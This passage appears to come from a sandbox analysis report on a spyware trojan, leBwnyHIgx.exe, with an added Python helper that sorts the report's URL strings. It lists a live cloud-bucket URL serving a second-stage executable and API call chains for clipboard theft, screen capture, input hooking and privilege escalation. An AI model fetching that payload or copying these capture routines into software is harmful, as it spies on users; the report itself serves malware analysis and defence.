Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: leBwnyHIgx.exe, 00000000.00000002.2078649644.0000000003906000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m76u8s
Source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.mi
Source: powershell.exe, 00000003.00000002.1703418182.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2029415416.000000000701B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000014.00000002.1996269596.0000000002971000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsof
Source: powershell.exe, 0000000B.00000002.1806539404.0000000006E55000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1780310479.00000000028CA000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0A
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0C
Source: wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.dr; String found in binary or memory: http://s.symcd.com06
                      Source: powershell.exe, 00000013.00000002.2028829277.0000000006FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microsoft.co
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004D16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000005016000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000054C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004E55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: http://www.innosetup.com/
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: http://www.remobjects.com/ps
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000004BC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1781132282.0000000004271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1998706833.00000000042BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBtq
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: leBwnyHIgx.exe, leBwnyHIgx.exe.0.drString found in binary or memory: https://code.visualstudio.com/0
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2078434267.00000000032FC000.00000004.00000010.00020000.00000000.sdmp, wpsv.5.6.3[1].exe.0.dr, wpsv.5.6.3.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
                      Source: powershell.exe, 00000013.00000002.2007422106.00000000049C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000003.00000002.1704205290.0000000005311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.000000000581D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1749704314.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2007422106.0000000004FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000003.00000002.1706524566.0000000005C27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1762406995.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1795405452.00000000052D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2023878360.00000000058D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exeX
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownHTTPS traffic detected: 47.79.48.230:443 -> 192.168.2.4:49732 version: TLS 1.2
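Nearly all of the URL hits above are certificate-revocation, OCSP and CPS pointers carried by any Authenticode-signed binary, or strings the PowerShell runtime, NuGet and Pester ship with; only the aliyuncs.com bucket that serves wpsv.5.6.3.exe is an indicator worth acting on. Many rows also carry carving damage (trailing DER bytes such as "com0A", junk after ".exe", truncated "crl.mi"). The following Python is an added triage helper, not part of the Joe Sandbox report or its tooling: the hint lists are this editor's assumption and the sample rows are constructed from the lines above. It normalises each string and buckets it, so the 45 rows collapse to the two download URLs.

```python
"""Added triage helper: collapse 'String found in binary or memory' URL
hits to the few worth acting on.  Hint lists are an assumption for this
example, not a Joe Sandbox feature."""
import re
from urllib.parse import urlsplit

# Authenticode/timestamping plumbing embedded in any signed binary.
PKI_HINTS = ("crl.", "crl3.", "crl4.", "ocsp.", "symcb.com", "symcd.com",
             "ts-aia.", "ts-crl.", "ts-ocsp.", "/cps", "/rpa")
# Strings the PowerShell runtime, NuGet, Pester and installer stubs carry.
TOOLING_HINTS = ("nuget.org", "pesterbdd.com", "github.com/pester", "aka.ms",
                 "contoso.com", "schemas.xmlsoap.org", "schemas.microsoft",
                 "apache.org", "innosetup.com", "remobjects.com",
                 "code.visualstudio.com", "go.micro")

# Bytes glued after a file extension are carving junk ('...exeX', '.crl0S').
EXT_RE = re.compile(r"^(.*?\.(?:exe|dll|ps1|crl|cer))(?=.)", re.I)
# For a bare host, keep the longest prefix ending in a known TLD ('com0A').
HOST_RE = re.compile(r"^(.*\.(?:com|org|net|ms|cn))", re.I)
# DER length bytes after a short path: '/cps0%', '/rpa0.', '/CPS0'.
DER_TAIL_RE = re.compile(r"(?<=[^/])0[^A-Za-z0-9]?$")
HIT_RE = re.compile(r"String found in binary or memory:\s*(\S+)")


def normalise(url: str) -> str:
    """Strip the trailing bytes that memory carving glues onto a URL."""
    m = EXT_RE.match(url)
    if m:
        return m.group(1)
    parts = urlsplit(url)
    host, path = parts.netloc, parts.path
    if path in ("", "/"):
        hm = HOST_RE.match(host)
        if hm:
            host = hm.group(1)
    else:
        path = DER_TAIL_RE.sub("", path)
    return f"{parts.scheme}://{host}{path}"


def classify(url: str) -> str:
    low = url.lower()
    if any(h in low for h in PKI_HINTS):
        return "pki-noise"
    if any(h in low for h in TOOLING_HINTS):
        return "runtime-noise"
    return "candidate-ioc"


def triage(report_text: str) -> dict[str, list[str]]:
    """Map each bucket to its sorted, de-duplicated normalised URLs."""
    buckets: dict[str, set[str]] = {"pki-noise": set(), "runtime-noise": set(),
                                    "candidate-ioc": set()}
    for m in HIT_RE.finditer(report_text):
        url = normalise(m.group(1))
        buckets[classify(url)].add(url)
    return {k: sorted(v) for k, v in buckets.items()}


# Constructed sample rows modelled on the report lines above.
SAMPLE = """\
Source: powershell.exe, 0000000B.00000002.sdmp String found in binary or memory: http://crl.mi
Source: wpsv.5.6.3.exe.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: wpsv.5.6.3.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: wpsv.5.6.3.exe.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: leBwnyHIgx.exe.0.dr String found in binary or memory: http://s.symcd.com06
Source: leBwnyHIgx.exe.0.dr String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000003.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000013.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: leBwnyHIgx.exe, 00000000.sdmp String found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/
Source: leBwnyHIgx.exe, 00000005.sdmp String found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exe
Source: leBwnyHIgx.exe, 00000000.sdmp String found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exeX
Source: leBwnyHIgx.exe, 00000000.sdmp String found in binary or memory: https://xrpy.oss-ap-southeast-1.aliyuncs.com/wpsv.5.6.3.exec
"""

if __name__ == "__main__":
    for bucket, urls in triage(SAMPLE).items():
        print(bucket)
        for u in urls:
            print("  ", u)
```

The extension and TLD trimming is deliberately conservative: a string with no recognisable anchor (the truncated `http://crl.mi`, or `aka.ms/pscore6lBtq`) is left as found rather than guessed at, because a normaliser that invents characters produces indicators that never match.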

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Windows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dll
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00CD18A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00D918A7 GetModuleHandleA,CreateWindowExW,SendMessageW,CreateThread,PostQuitMessage,NtdllDefWindowProc_W
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307B41B ExitWindowsEx
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307B43F ExitWindowsEx
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307B463 ExitWindowsEx
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0064F1DC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040AC84
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_10016721
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00CD0032
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00CE66F8
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04A0B490
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_04A0B470
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0064F1DC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040AC84
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03076EE0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03076C50
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0308E341
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03088381
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_030724B0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0308EA1D
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03078900
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0308F9FF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0308D89F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0308DDF0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0272122F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0271B66A
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02721780
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_027124B0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02721E5C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02720CDE
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02722D91
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_10016721
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00D90032
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00DA66F8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026C0032
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026D1206
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026CB641
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026D1757
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026D0CB5
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026C2487
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026D2D68
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02EF82BF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02F0D25E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02F0F3BE
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02EF689F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02EF1E6F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02EF660F
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02F0D7AF
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02F07D40
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02F0DD00
                      Source: Joe Sandbox View Dropped File: C:\Users\user\Downloads\wpsv.5.6.3.exe C6AC7D9ADD40B913112B265D4F366D9EF80BBD711049DB085FC750FCAD4E14D8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: String function: 005C94E0 appears 40 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: String function: 005E0B90 appears 60 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: String function: 005E08AC appears 46 times
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: String function: 03084300 appears 32 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: String function: 005E0B90 appears 60 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: String function: 005C94E0 appears 40 times
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: String function: 005E08AC appears 46 times
                      Source: leBwnyHIgx.exe, 00000000.00000000.1657771308.0000000000672000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077897111.000000000245A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000000.00000003.1717834094.0000000002970000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000005.00000002.4133552323.000000000268A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamekernel32j% vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe Binary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe.0.dr Binary or memory string: OriginalFileName vs leBwnyHIgx.exe
                      Source: leBwnyHIgx.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@29/27@1/2
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_005FA9A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03077740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03077620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03077B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03076C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_10001FA0 CreateToolhelp32Snapshot,memset,Process32FirstW,WideCharToMultiByte,CloseHandle,Process32NextW,CloseHandle
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0060F338 GetVersion,CoCreateInstance
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0046523C FindResourceW,LoadResource,SizeofResource,LockResource
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe File created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe
